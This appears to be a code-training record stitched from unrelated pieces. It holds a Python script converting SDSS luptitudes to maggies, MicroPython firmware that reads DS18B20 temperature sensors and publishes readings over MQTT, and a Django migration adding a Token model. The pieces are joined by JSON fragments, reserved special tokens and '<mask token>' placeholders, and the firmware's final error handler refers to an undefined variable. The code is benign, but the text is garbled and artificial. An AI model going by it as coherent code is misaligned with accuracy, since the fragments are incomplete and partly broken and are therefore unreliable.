* b[1] * np.sinh(-np.log(10.0) / 2.5 * dered_g - np.log(b[1]))\nflux_r = 2.0 * b[2] * np.sinh(-np.log(10.0) / 2.5 * dered_r - np.log(b[2]))\nflux_i = 2.0 * b[3] * np.sinh(-np.log(10.0) / 2.5 * dered_i - np.log(b[3]))\nflux_z = 2.0 * b[4] * np.sinh(-np.log(10.0) / 2.5 * dered_z - np.log(b[4]))\nivar_u = 2.0 * b[0] * np.cosh(-np.log(10.0) / 2.5 * dered_u - np.log(b[0])) * (\n -np.log(10) / 2.5) * err_u\nivar_g = 2.0 * b[1] * np.cosh(-np.log(10.0) / 2.5 * dered_g - np.log(b[1])) * (\n -np.log(10) / 2.5) * err_g\nivar_r = 2.0 * b[2] * np.cosh(-np.log(10.0) / 2.5 * dered_r - np.log(b[2])) * (\n -np.log(10) / 2.5) * err_r\nivar_i = 2.0 * b[3] * np.cosh(-np.log(10.0) / 2.5 * dered_i - np.log(b[3])) * (\n -np.log(10) / 2.5) * err_i\nivar_z = 2.0 * b[4] * np.cosh(-np.log(10.0) / 2.5 * dered_z - np.log(b[4])) * (\n -np.log(10) / 2.5) * err_z\nivar_u = 1.0 / ivar_u ** 2.0\nivar_g = 1.0 / ivar_g ** 2.0\nivar_r = 1.0 / ivar_r ** 2.0\nivar_i = 1.0 / ivar_i ** 2.0\nivar_z = 1.0 / ivar_z ** 2.0\nto_exp = np.transpose([z, 
flux_u, flux_g, flux_r, flux_i, flux_z, ivar_u,\n ivar_g, ivar_r, ivar_i, ivar_z])\nnp.savetxt('./output/maggies.txt', to_exp)\n",
"step-4": "<mask token>\nimport numpy as np\nimport pandas as pd\nimport sys\nassert len(sys.argv) == 2\nfname = sys.argv[1]\nprint(\"\"\"Converting maggies from catalog \n%s\"\"\" % fname)\ndf = pd.read_csv(fname)\nz = df['z'].values\nmod_u = df['cModelMag_u'].values\nmod_g = df['cModelMag_g'].values\nmod_r = df['cModelMag_r'].values\nmod_i = df['cModelMag_i'].values\nmod_z = df['cModelMag_z'].values\next_u = df['extinction_u'].values\next_g = df['extinction_g'].values\next_r = df['extinction_r'].values\next_i = df['extinction_i'].values\next_z = df['extinction_z'].values\nerr_u = df['cModelMagErr_u'].values\nerr_g = df['cModelMagErr_g'].values\nerr_r = df['cModelMagErr_r'].values\nerr_i = df['cModelMagErr_i'].values\nerr_z = df['cModelMagErr_z'].values\ndered_u = mod_u - ext_u\ndered_g = mod_g - ext_g\ndered_r = mod_r - ext_r\ndered_i = mod_i - ext_i\ndered_z = mod_z - ext_z\nb = np.array([1.4, 0.9, 1.2, 1.8, 7.4]) * 1e-10\nflux_u = 2.0 * b[0] * np.sinh(-np.log(10.0) / 2.5 * dered_u - np.log(b[0]))\nflux_g = 2.0 * b[1] * np.sinh(-np.log(10.0) / 2.5 * dered_g - np.log(b[1]))\nflux_r = 2.0 * b[2] * np.sinh(-np.log(10.0) / 2.5 * dered_r - np.log(b[2]))\nflux_i = 2.0 * b[3] * np.sinh(-np.log(10.0) / 2.5 * dered_i - np.log(b[3]))\nflux_z = 2.0 * b[4] * np.sinh(-np.log(10.0) / 2.5 * dered_z - np.log(b[4]))\nivar_u = 2.0 * b[0] * np.cosh(-np.log(10.0) / 2.5 * dered_u - np.log(b[0])) * (\n -np.log(10) / 2.5) * err_u\nivar_g = 2.0 * b[1] * np.cosh(-np.log(10.0) / 2.5 * dered_g - np.log(b[1])) * (\n -np.log(10) / 2.5) * err_g\nivar_r = 2.0 * b[2] * np.cosh(-np.log(10.0) / 2.5 * dered_r - np.log(b[2])) * (\n -np.log(10) / 2.5) * err_r\nivar_i = 2.0 * b[3] * np.cosh(-np.log(10.0) / 2.5 * dered_i - np.log(b[3])) * (\n -np.log(10) / 2.5) * err_i\nivar_z = 2.0 * b[4] * np.cosh(-np.log(10.0) / 2.5 * dered_z - np.log(b[4])) * (\n -np.log(10) / 2.5) * err_z\nivar_u = 1.0 / ivar_u ** 2.0\nivar_g = 1.0 / ivar_g ** 2.0\nivar_r = 1.0 / ivar_r ** 2.0\nivar_i = 1.0 / ivar_i ** 
2.0\nivar_z = 1.0 / ivar_z ** 2.0\nto_exp = np.transpose([z, flux_u, flux_g, flux_r, flux_i, flux_z, ivar_u,\n ivar_g, ivar_r, ivar_i, ivar_z])\nnp.savetxt('./output/maggies.txt', to_exp)\n",
"step-5": "''' Converts luptitudes to maggies and stores in folder output\n Written by P. Gallardo\n'''\nimport numpy as np\nimport pandas as pd\nimport sys\n\nassert len(sys.argv) == 2 # usage: lups2maggies.py /path/to/cat.csv\nfname = sys.argv[1]\n\nprint(\"Converting maggies from catalog \\n%s\" % fname)\n\ndf = pd.read_csv(fname)\n\nz = df['z'].values\n\nmod_u = df['cModelMag_u'].values\nmod_g = df['cModelMag_g'].values\nmod_r = df['cModelMag_r'].values\nmod_i = df['cModelMag_i'].values\nmod_z = df['cModelMag_z'].values\n\next_u = df['extinction_u'].values\next_g = df['extinction_g'].values\next_r = df['extinction_r'].values\next_i = df['extinction_i'].values\next_z = df['extinction_z'].values\n\nerr_u = df['cModelMagErr_u'].values\nerr_g = df['cModelMagErr_g'].values\nerr_r = df['cModelMagErr_r'].values\nerr_i = df['cModelMagErr_i'].values\nerr_z = df['cModelMagErr_z'].values\n\n\ndered_u = mod_u - ext_u\ndered_g = mod_g - ext_g\ndered_r = mod_r - ext_r\ndered_i = mod_i - ext_i\ndered_z = mod_z - ext_z\n\nb = np.array([1.4, 0.9, 1.2, 1.8, 7.4]) * 1e-10\nflux_u = 2.*b[0] * np.sinh(-np.log(10.)/2.5*dered_u-np.log(b[0]))\nflux_g = 2.*b[1] * np.sinh(-np.log(10.)/2.5*dered_g-np.log(b[1]))\nflux_r = 2.*b[2] * np.sinh(-np.log(10.)/2.5*dered_r-np.log(b[2]))\nflux_i = 2.*b[3] * np.sinh(-np.log(10.)/2.5*dered_i-np.log(b[3]))\nflux_z = 2.*b[4] * np.sinh(-np.log(10.)/2.5*dered_z-np.log(b[4]))\n\n\nivar_u = 2.*b[0]*np.cosh(-np.log(10.)/2.5*dered_u-np.log(b[0]))*(-np.log(10)/2.5)*err_u # noqa\nivar_g = 2.*b[1]*np.cosh(-np.log(10.)/2.5*dered_g-np.log(b[1]))*(-np.log(10)/2.5)*err_g # noqa\nivar_r = 2.*b[2]*np.cosh(-np.log(10.)/2.5*dered_r-np.log(b[2]))*(-np.log(10)/2.5)*err_r # noqa\nivar_i = 2.*b[3]*np.cosh(-np.log(10.)/2.5*dered_i-np.log(b[3]))*(-np.log(10)/2.5)*err_i # noqa\nivar_z = 2.*b[4]*np.cosh(-np.log(10.)/2.5*dered_z-np.log(b[4]))*(-np.log(10)/2.5)*err_z # noqa\n\nivar_u = 1./ivar_u**2.\nivar_g = 1./ivar_g**2.\nivar_r = 1./ivar_r**2.\nivar_i = 1./ivar_i**2.\nivar_z 
= 1./ivar_z**2.\n\nto_exp = np.transpose([z, flux_u, flux_g, flux_r, flux_i, flux_z,\n ivar_u, ivar_g, ivar_r, ivar_i, ivar_z])\nnp.savetxt('./output/maggies.txt',\n to_exp)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Error(Exception):
pass
class Warning(Exception):
pass
def gettimestr():
rtc = machine.RTC()
curtime = rtc.datetime()
_time = '%04d' % curtime[0] + '%02d' % curtime[1] + '%02d' % curtime[2
] + ' ' + '%02d' % curtime[4] + '%02d' % curtime[5]
return _time
def deepsleep():
rtc = machine.RTC()
rtc.irq(trigger=rtc.ALARM0, wake=machine.DEEPSLEEP)
rtc.alarm(rtc.ALARM0, 60000)
machine.deepsleep()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Error(Exception):
pass
class Warning(Exception):
pass
def gettimestr():
rtc = machine.RTC()
curtime = rtc.datetime()
_time = '%04d' % curtime[0] + '%02d' % curtime[1] + '%02d' % curtime[2
] + ' ' + '%02d' % curtime[4] + '%02d' % curtime[5]
return _time
def deepsleep():
rtc = machine.RTC()
rtc.irq(trigger=rtc.ALARM0, wake=machine.DEEPSLEEP)
rtc.alarm(rtc.ALARM0, 60000)
machine.deepsleep()
<|reserved_special_token_0|>
def timercallback(tim):
global timer_index
if timer_index == 0:
print('Timer reached 0, something went wrong -> sleep.')
deepsleep()
print('Timer index ' + str(timer_index))
timer_index = timer_index - 1
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Error(Exception):
pass
class Warning(Exception):
pass
def gettimestr():
rtc = machine.RTC()
curtime = rtc.datetime()
_time = '%04d' % curtime[0] + '%02d' % curtime[1] + '%02d' % curtime[2
] + ' ' + '%02d' % curtime[4] + '%02d' % curtime[5]
return _time
def deepsleep():
rtc = machine.RTC()
rtc.irq(trigger=rtc.ALARM0, wake=machine.DEEPSLEEP)
rtc.alarm(rtc.ALARM0, 60000)
machine.deepsleep()
<|reserved_special_token_0|>
def timercallback(tim):
global timer_index
if timer_index == 0:
print('Timer reached 0, something went wrong -> sleep.')
deepsleep()
print('Timer index ' + str(timer_index))
timer_index = timer_index - 1
<|reserved_special_token_0|>
if stoppin.value() == 0:
print('Pin down, stop')
else:
try:
tim = Timer(-1)
tim.init(period=1000, mode=Timer.PERIODIC, callback=timercallback)
try:
f = open('config.json', 'r')
config = ujson.loads(f.readall())
except OSError as e:
if e.args[0] == errno.MP_ENOENT or e.args[0] == errno.MP_EIO:
print('I/O error({0}): {1}'.format(e.args[0], e.args[1]))
raise Error
ONEWIREPIN = config['ONEWIREPIN']
dat = machine.Pin(ONEWIREPIN)
ds = ds18x20.DS18X20(onewire.OneWire(dat))
roms = ds.scan()
print('found devices:', roms)
if len(roms) > 0:
ds.convert_temp()
time.sleep_ms(750)
print('Check wifi connection.')
wifi = network.WLAN(network.STA_IF)
i = 0
while not wifi.isconnected():
if i > 10:
print('No wifi connection.')
raise Warning
print('.')
time.sleep(1)
i = i + 1
try:
print('Get time.')
ntptime.settime()
except OSError as e:
if e.args[0] == errno.ETIMEDOUT:
print("Timeout error, didn't get ntptime.")
if machine.reset_cause() != machine.DEEPSLEEP:
raise Warning
if e.args[0] == -2:
print("DNS error, didn't get ntptime.")
if machine.reset_cause() != machine.DEEPSLEEP:
raise Warning
else:
raise
_time = gettimestr()
print('Open MQTT connection.')
c = MQTTClient('umqtt_client', config['MQTT_BROKER'])
c.connect()
if config['MEASURE_VOLTAGE']:
adc = machine.ADC(0)
voltage = adc.read()
topic = 'raw/esp8266/' + ubinascii.hexlify(machine.unique_id()
).decode() + '/voltage'
message = _time + ' ' + str(voltage)
c.publish(topic, message)
for rom in roms:
print('topic ' + config['MQTT_TOPIC'] + ubinascii.hexlify(rom).
decode())
topic = config['MQTT_TOPIC'] + ubinascii.hexlify(rom).decode(
) + '/temperature'
print(_time)
print(ds.read_temp(rom))
message = _time + ' ' + str(ds.read_temp(rom))
c.publish(topic, message)
c.disconnect()
deepsleep()
except Warning:
deepsleep()
except Error:
print('Error({0}): {1}'.format(e.args[0], e.args[1]))
<|reserved_special_token_1|>
import time
import machine
from machine import Timer
import network
import onewire, ds18x20
import ujson
import ubinascii
from umqtt.simple import MQTTClient
import ntptime
import errno
class Error(Exception):
pass
class Warning(Exception):
pass
def gettimestr():
rtc = machine.RTC()
curtime = rtc.datetime()
_time = '%04d' % curtime[0] + '%02d' % curtime[1] + '%02d' % curtime[2
] + ' ' + '%02d' % curtime[4] + '%02d' % curtime[5]
return _time
def deepsleep():
rtc = machine.RTC()
rtc.irq(trigger=rtc.ALARM0, wake=machine.DEEPSLEEP)
rtc.alarm(rtc.ALARM0, 60000)
machine.deepsleep()
timer_index = 20
def timercallback(tim):
global timer_index
if timer_index == 0:
print('Timer reached 0, something went wrong -> sleep.')
deepsleep()
print('Timer index ' + str(timer_index))
timer_index = timer_index - 1
stoppin = machine.Pin(4, mode=machine.Pin.IN, pull=machine.Pin.PULL_UP)
if stoppin.value() == 0:
print('Pin down, stop')
else:
try:
tim = Timer(-1)
tim.init(period=1000, mode=Timer.PERIODIC, callback=timercallback)
try:
f = open('config.json', 'r')
config = ujson.loads(f.readall())
except OSError as e:
if e.args[0] == errno.MP_ENOENT or e.args[0] == errno.MP_EIO:
print('I/O error({0}): {1}'.format(e.args[0], e.args[1]))
raise Error
ONEWIREPIN = config['ONEWIREPIN']
dat = machine.Pin(ONEWIREPIN)
ds = ds18x20.DS18X20(onewire.OneWire(dat))
roms = ds.scan()
print('found devices:', roms)
if len(roms) > 0:
ds.convert_temp()
time.sleep_ms(750)
print('Check wifi connection.')
wifi = network.WLAN(network.STA_IF)
i = 0
while not wifi.isconnected():
if i > 10:
print('No wifi connection.')
raise Warning
print('.')
time.sleep(1)
i = i + 1
try:
print('Get time.')
ntptime.settime()
except OSError as e:
if e.args[0] == errno.ETIMEDOUT:
print("Timeout error, didn't get ntptime.")
if machine.reset_cause() != machine.DEEPSLEEP:
raise Warning
if e.args[0] == -2:
print("DNS error, didn't get ntptime.")
if machine.reset_cause() != machine.DEEPSLEEP:
raise Warning
else:
raise
_time = gettimestr()
print('Open MQTT connection.')
c = MQTTClient('umqtt_client', config['MQTT_BROKER'])
c.connect()
if config['MEASURE_VOLTAGE']:
adc = machine.ADC(0)
voltage = adc.read()
topic = 'raw/esp8266/' + ubinascii.hexlify(machine.unique_id()
).decode() + '/voltage'
message = _time + ' ' + str(voltage)
c.publish(topic, message)
for rom in roms:
print('topic ' + config['MQTT_TOPIC'] + ubinascii.hexlify(rom).
decode())
topic = config['MQTT_TOPIC'] + ubinascii.hexlify(rom).decode(
) + '/temperature'
print(_time)
print(ds.read_temp(rom))
message = _time + ' ' + str(ds.read_temp(rom))
c.publish(topic, message)
c.disconnect()
deepsleep()
except Warning:
deepsleep()
except Error:
print('Error({0}): {1}'.format(e.args[0], e.args[1]))
<|reserved_special_token_1|>
import time
import machine
from machine import Timer
import network
import onewire, ds18x20
import ujson
import ubinascii
from umqtt.simple import MQTTClient
import ntptime
import errno
#Thrown if an error that is fatal occurs,
#stop measurement cycle.
class Error(Exception):
pass
#Thrown if an error that is not fatal occurs,
#goes to deep sleep and continues as normal.
#For example no wifi connection at this time.
class Warning(Exception):
pass
def gettimestr():
rtc=machine.RTC()
curtime=rtc.datetime()
_time="%04d" % curtime[0]+ "%02d" % curtime[1]+ "%02d" % curtime[2]+" "+ "%02d" % curtime[4]+ "%02d" % curtime[5]
return _time
def deepsleep():
# configure RTC.ALARM0 to be able to wake the device
rtc = machine.RTC()
rtc.irq(trigger=rtc.ALARM0, wake=machine.DEEPSLEEP)
# set RTC.ALARM0 to fire after 60 seconds (waking the device)
rtc.alarm(rtc.ALARM0, 60000)
# put the device to sleep
machine.deepsleep()
timer_index=20
def timercallback(tim):
global timer_index
if timer_index==0:
print("Timer reached 0, something went wrong -> sleep.")
deepsleep()
print("Timer index "+str(timer_index))
timer_index=timer_index-1
#check if gpio4 is pulled down
stoppin = machine.Pin(4,mode=machine.Pin.IN,pull=machine.Pin.PULL_UP)
if stoppin.value()==0:
print("Pin down, stop")
else:
try:
#normal loop
tim = Timer(-1)
tim.init(period=1000, mode=Timer.PERIODIC, callback=timercallback)
try:
f = open('config.json', 'r')
config = ujson.loads(f.readall())
except OSError as e:
if e.args[0] == errno.MP_ENOENT or e.args[0] == errno.MP_EIO:
print("I/O error({0}): {1}".format(e.args[0], e.args[1]))
raise Error
# the device is on GPIOxx
ONEWIREPIN = config['ONEWIREPIN']
dat = machine.Pin(ONEWIREPIN)
# create the onewire object
ds = ds18x20.DS18X20(onewire.OneWire(dat))
# scan for devices on the bus
roms = ds.scan()
print('found devices:', roms)
if (len(roms)>0):
ds.convert_temp()
time.sleep_ms(750)
# Check if we have wifi, and wait for connection if not.
print("Check wifi connection.")
wifi = network.WLAN(network.STA_IF)
i = 0
while not wifi.isconnected():
if (i>10):
print("No wifi connection.")
raise Warning
print(".")
time.sleep(1)
i=i+1
try:
print("Get time.")
ntptime.settime()
except OSError as e:
if e.args[0] == errno.ETIMEDOUT: #OSError: [Errno 110] ETIMEDOUT
print("Timeout error, didn't get ntptime.")
#if we did not wake up from deep sleep
#we cannot continue until we get correct time
if (machine.reset_cause()!=machine.DEEPSLEEP):
raise Warning
if e.args[0] == -2: #OSError: dns error
print("DNS error, didn't get ntptime.")
#if we did not wake up from deep sleep
#we cannot continue until we get correct time
if (machine.reset_cause()!=machine.DEEPSLEEP):
raise Warning
else:
raise
_time=gettimestr()
print("Open MQTT connection.")
c = MQTTClient("umqtt_client", config['MQTT_BROKER'])
c.connect()
#check battery voltage?
if (config['MEASURE_VOLTAGE']):
adc = machine.ADC(0)
voltage = adc.read();
topic="raw/esp8266/"+ubinascii.hexlify(machine.unique_id()).decode()+"/voltage"
message=_time+" "+str(voltage)
c.publish(topic,message)
#loop ds18b20 and send results to mqtt broker
for rom in roms:
print("topic "+config['MQTT_TOPIC']+ubinascii.hexlify(rom).decode())
topic=config['MQTT_TOPIC']+ubinascii.hexlify(rom).decode()+"/temperature"
print(_time)
print(ds.read_temp(rom))
message=_time+' '+str(ds.read_temp(rom))
c.publish(topic,message)
c.disconnect()
deepsleep()
except Warning:
deepsleep()
except Error:
print("Error({0}): {1}".format(e.args[0], e.args[1]))
|
flexible
|
{
"blob_id": "b934770e9e57a0ead124e245f394433ce853dec9",
"index": 8691,
"step-1": "<mask token>\n\n\nclass Error(Exception):\n pass\n\n\nclass Warning(Exception):\n pass\n\n\ndef gettimestr():\n rtc = machine.RTC()\n curtime = rtc.datetime()\n _time = '%04d' % curtime[0] + '%02d' % curtime[1] + '%02d' % curtime[2\n ] + ' ' + '%02d' % curtime[4] + '%02d' % curtime[5]\n return _time\n\n\ndef deepsleep():\n rtc = machine.RTC()\n rtc.irq(trigger=rtc.ALARM0, wake=machine.DEEPSLEEP)\n rtc.alarm(rtc.ALARM0, 60000)\n machine.deepsleep()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Error(Exception):\n pass\n\n\nclass Warning(Exception):\n pass\n\n\ndef gettimestr():\n rtc = machine.RTC()\n curtime = rtc.datetime()\n _time = '%04d' % curtime[0] + '%02d' % curtime[1] + '%02d' % curtime[2\n ] + ' ' + '%02d' % curtime[4] + '%02d' % curtime[5]\n return _time\n\n\ndef deepsleep():\n rtc = machine.RTC()\n rtc.irq(trigger=rtc.ALARM0, wake=machine.DEEPSLEEP)\n rtc.alarm(rtc.ALARM0, 60000)\n machine.deepsleep()\n\n\n<mask token>\n\n\ndef timercallback(tim):\n global timer_index\n if timer_index == 0:\n print('Timer reached 0, something went wrong -> sleep.')\n deepsleep()\n print('Timer index ' + str(timer_index))\n timer_index = timer_index - 1\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Error(Exception):\n pass\n\n\nclass Warning(Exception):\n pass\n\n\ndef gettimestr():\n rtc = machine.RTC()\n curtime = rtc.datetime()\n _time = '%04d' % curtime[0] + '%02d' % curtime[1] + '%02d' % curtime[2\n ] + ' ' + '%02d' % curtime[4] + '%02d' % curtime[5]\n return _time\n\n\ndef deepsleep():\n rtc = machine.RTC()\n rtc.irq(trigger=rtc.ALARM0, wake=machine.DEEPSLEEP)\n rtc.alarm(rtc.ALARM0, 60000)\n machine.deepsleep()\n\n\n<mask token>\n\n\ndef timercallback(tim):\n global timer_index\n if timer_index == 0:\n print('Timer reached 0, something went wrong -> sleep.')\n deepsleep()\n print('Timer index ' + str(timer_index))\n timer_index = timer_index - 1\n\n\n<mask token>\nif stoppin.value() == 0:\n print('Pin down, stop')\nelse:\n try:\n tim = Timer(-1)\n tim.init(period=1000, mode=Timer.PERIODIC, callback=timercallback)\n try:\n f = open('config.json', 'r')\n config = ujson.loads(f.readall())\n except OSError as e:\n if e.args[0] == errno.MP_ENOENT or e.args[0] == errno.MP_EIO:\n print('I/O error({0}): {1}'.format(e.args[0], e.args[1]))\n raise Error\n ONEWIREPIN = config['ONEWIREPIN']\n dat = machine.Pin(ONEWIREPIN)\n ds = ds18x20.DS18X20(onewire.OneWire(dat))\n roms = ds.scan()\n print('found devices:', roms)\n if len(roms) > 0:\n ds.convert_temp()\n time.sleep_ms(750)\n print('Check wifi connection.')\n wifi = network.WLAN(network.STA_IF)\n i = 0\n while not wifi.isconnected():\n if i > 10:\n print('No wifi connection.')\n raise Warning\n print('.')\n time.sleep(1)\n i = i + 1\n try:\n print('Get time.')\n ntptime.settime()\n except OSError as e:\n if e.args[0] == errno.ETIMEDOUT:\n print(\"Timeout error, didn't get ntptime.\")\n if machine.reset_cause() != machine.DEEPSLEEP:\n raise Warning\n if e.args[0] == -2:\n print(\"DNS error, didn't get ntptime.\")\n if machine.reset_cause() != machine.DEEPSLEEP:\n raise Warning\n else:\n raise\n _time = gettimestr()\n print('Open MQTT connection.')\n c = 
MQTTClient('umqtt_client', config['MQTT_BROKER'])\n c.connect()\n if config['MEASURE_VOLTAGE']:\n adc = machine.ADC(0)\n voltage = adc.read()\n topic = 'raw/esp8266/' + ubinascii.hexlify(machine.unique_id()\n ).decode() + '/voltage'\n message = _time + ' ' + str(voltage)\n c.publish(topic, message)\n for rom in roms:\n print('topic ' + config['MQTT_TOPIC'] + ubinascii.hexlify(rom).\n decode())\n topic = config['MQTT_TOPIC'] + ubinascii.hexlify(rom).decode(\n ) + '/temperature'\n print(_time)\n print(ds.read_temp(rom))\n message = _time + ' ' + str(ds.read_temp(rom))\n c.publish(topic, message)\n c.disconnect()\n deepsleep()\n except Warning:\n deepsleep()\n except Error:\n print('Error({0}): {1}'.format(e.args[0], e.args[1]))\n",
"step-4": "import time\nimport machine\nfrom machine import Timer\nimport network\nimport onewire, ds18x20\nimport ujson\nimport ubinascii\nfrom umqtt.simple import MQTTClient\nimport ntptime\nimport errno\n\n\nclass Error(Exception):\n pass\n\n\nclass Warning(Exception):\n pass\n\n\ndef gettimestr():\n rtc = machine.RTC()\n curtime = rtc.datetime()\n _time = '%04d' % curtime[0] + '%02d' % curtime[1] + '%02d' % curtime[2\n ] + ' ' + '%02d' % curtime[4] + '%02d' % curtime[5]\n return _time\n\n\ndef deepsleep():\n rtc = machine.RTC()\n rtc.irq(trigger=rtc.ALARM0, wake=machine.DEEPSLEEP)\n rtc.alarm(rtc.ALARM0, 60000)\n machine.deepsleep()\n\n\ntimer_index = 20\n\n\ndef timercallback(tim):\n global timer_index\n if timer_index == 0:\n print('Timer reached 0, something went wrong -> sleep.')\n deepsleep()\n print('Timer index ' + str(timer_index))\n timer_index = timer_index - 1\n\n\nstoppin = machine.Pin(4, mode=machine.Pin.IN, pull=machine.Pin.PULL_UP)\nif stoppin.value() == 0:\n print('Pin down, stop')\nelse:\n try:\n tim = Timer(-1)\n tim.init(period=1000, mode=Timer.PERIODIC, callback=timercallback)\n try:\n f = open('config.json', 'r')\n config = ujson.loads(f.readall())\n except OSError as e:\n if e.args[0] == errno.MP_ENOENT or e.args[0] == errno.MP_EIO:\n print('I/O error({0}): {1}'.format(e.args[0], e.args[1]))\n raise Error\n ONEWIREPIN = config['ONEWIREPIN']\n dat = machine.Pin(ONEWIREPIN)\n ds = ds18x20.DS18X20(onewire.OneWire(dat))\n roms = ds.scan()\n print('found devices:', roms)\n if len(roms) > 0:\n ds.convert_temp()\n time.sleep_ms(750)\n print('Check wifi connection.')\n wifi = network.WLAN(network.STA_IF)\n i = 0\n while not wifi.isconnected():\n if i > 10:\n print('No wifi connection.')\n raise Warning\n print('.')\n time.sleep(1)\n i = i + 1\n try:\n print('Get time.')\n ntptime.settime()\n except OSError as e:\n if e.args[0] == errno.ETIMEDOUT:\n print(\"Timeout error, didn't get ntptime.\")\n if machine.reset_cause() != machine.DEEPSLEEP:\n 
raise Warning\n if e.args[0] == -2:\n print(\"DNS error, didn't get ntptime.\")\n if machine.reset_cause() != machine.DEEPSLEEP:\n raise Warning\n else:\n raise\n _time = gettimestr()\n print('Open MQTT connection.')\n c = MQTTClient('umqtt_client', config['MQTT_BROKER'])\n c.connect()\n if config['MEASURE_VOLTAGE']:\n adc = machine.ADC(0)\n voltage = adc.read()\n topic = 'raw/esp8266/' + ubinascii.hexlify(machine.unique_id()\n ).decode() + '/voltage'\n message = _time + ' ' + str(voltage)\n c.publish(topic, message)\n for rom in roms:\n print('topic ' + config['MQTT_TOPIC'] + ubinascii.hexlify(rom).\n decode())\n topic = config['MQTT_TOPIC'] + ubinascii.hexlify(rom).decode(\n ) + '/temperature'\n print(_time)\n print(ds.read_temp(rom))\n message = _time + ' ' + str(ds.read_temp(rom))\n c.publish(topic, message)\n c.disconnect()\n deepsleep()\n except Warning:\n deepsleep()\n except Error:\n print('Error({0}): {1}'.format(e.args[0], e.args[1]))\n",
"step-5": "import time\nimport machine\nfrom machine import Timer\nimport network\nimport onewire, ds18x20\nimport ujson\nimport ubinascii\nfrom umqtt.simple import MQTTClient\nimport ntptime\nimport errno\n\n#Thrown if an error that is fatal occurs,\n#stop measurement cycle.\nclass Error(Exception):\n pass\n\n#Thrown if an error that is not fatal occurs,\n#goes to deep sleep and continues as normal.\n#For example no wifi connection at this time.\nclass Warning(Exception):\n pass\n \ndef gettimestr():\n rtc=machine.RTC()\n curtime=rtc.datetime()\n _time=\"%04d\" % curtime[0]+ \"%02d\" % curtime[1]+ \"%02d\" % curtime[2]+\" \"+ \"%02d\" % curtime[4]+ \"%02d\" % curtime[5]\n return _time\n\ndef deepsleep():\n # configure RTC.ALARM0 to be able to wake the device\n rtc = machine.RTC()\n rtc.irq(trigger=rtc.ALARM0, wake=machine.DEEPSLEEP)\n\n # set RTC.ALARM0 to fire after 60 seconds (waking the device)\n rtc.alarm(rtc.ALARM0, 60000)\n\n # put the device to sleep\n machine.deepsleep()\n\ntimer_index=20\n\ndef timercallback(tim):\n global timer_index\n if timer_index==0:\n print(\"Timer reached 0, something went wrong -> sleep.\")\n deepsleep()\n print(\"Timer index \"+str(timer_index))\n timer_index=timer_index-1\n \n#check if gpio4 is pulled down\nstoppin = machine.Pin(4,mode=machine.Pin.IN,pull=machine.Pin.PULL_UP)\nif stoppin.value()==0:\n print(\"Pin down, stop\")\nelse:\n try:\n #normal loop\n\n tim = Timer(-1)\n tim.init(period=1000, mode=Timer.PERIODIC, callback=timercallback)\n\n try:\n f = open('config.json', 'r')\n config = ujson.loads(f.readall())\n except OSError as e:\n if e.args[0] == errno.MP_ENOENT or e.args[0] == errno.MP_EIO:\n print(\"I/O error({0}): {1}\".format(e.args[0], e.args[1]))\n raise Error\n\n # the device is on GPIOxx\n ONEWIREPIN = config['ONEWIREPIN']\n dat = machine.Pin(ONEWIREPIN)\n\n # create the onewire object\n ds = ds18x20.DS18X20(onewire.OneWire(dat))\n\n # scan for devices on the bus\n roms = ds.scan()\n print('found devices:', 
roms)\n if (len(roms)>0):\n ds.convert_temp()\n time.sleep_ms(750)\n\n # Check if we have wifi, and wait for connection if not.\n print(\"Check wifi connection.\")\n wifi = network.WLAN(network.STA_IF)\n i = 0\n while not wifi.isconnected():\n if (i>10):\n print(\"No wifi connection.\")\n raise Warning\n print(\".\")\n time.sleep(1)\n i=i+1\n\n try:\n print(\"Get time.\")\n ntptime.settime()\n except OSError as e:\n if e.args[0] == errno.ETIMEDOUT: #OSError: [Errno 110] ETIMEDOUT\n print(\"Timeout error, didn't get ntptime.\")\n #if we did not wake up from deep sleep\n #we cannot continue until we get correct time\n if (machine.reset_cause()!=machine.DEEPSLEEP):\n raise Warning\n if e.args[0] == -2: #OSError: dns error\n print(\"DNS error, didn't get ntptime.\")\n #if we did not wake up from deep sleep\n #we cannot continue until we get correct time\n if (machine.reset_cause()!=machine.DEEPSLEEP):\n raise Warning\n else:\n raise\n _time=gettimestr()\n \n\n print(\"Open MQTT connection.\")\n c = MQTTClient(\"umqtt_client\", config['MQTT_BROKER'])\n c.connect()\n\n #check battery voltage?\n if (config['MEASURE_VOLTAGE']):\n adc = machine.ADC(0)\n voltage = adc.read();\n topic=\"raw/esp8266/\"+ubinascii.hexlify(machine.unique_id()).decode()+\"/voltage\"\n message=_time+\" \"+str(voltage)\n c.publish(topic,message)\n\n #loop ds18b20 and send results to mqtt broker\n for rom in roms:\n print(\"topic \"+config['MQTT_TOPIC']+ubinascii.hexlify(rom).decode())\n topic=config['MQTT_TOPIC']+ubinascii.hexlify(rom).decode()+\"/temperature\"\n print(_time)\n print(ds.read_temp(rom))\n message=_time+' '+str(ds.read_temp(rom))\n c.publish(topic,message)\n\n c.disconnect()\n\n deepsleep()\n except Warning:\n deepsleep()\n except Error:\n print(\"Error({0}): {1}\".format(e.args[0], e.args[1]))\n \n",
"step-ids": [
4,
5,
6,
8,
9
]
}
|
[
4,
5,
6,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('votes', '0003_choice_votes')]
operations = [migrations.CreateModel(name='Token', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('token', models.CharField(editable=
False, max_length=6)), ('used', models.BooleanField(default=False,
editable=False))]), migrations.AlterField(model_name='choice', name
='votes', field=models.IntegerField(default=0, editable=False))]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('votes', '0003_choice_votes')]
operations = [migrations.CreateModel(name='Token', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('token', models.CharField(editable=
False, max_length=6)), ('used', models.BooleanField(default=False,
editable=False))]), migrations.AlterField(model_name='choice', name
='votes', field=models.IntegerField(default=0, editable=False))]
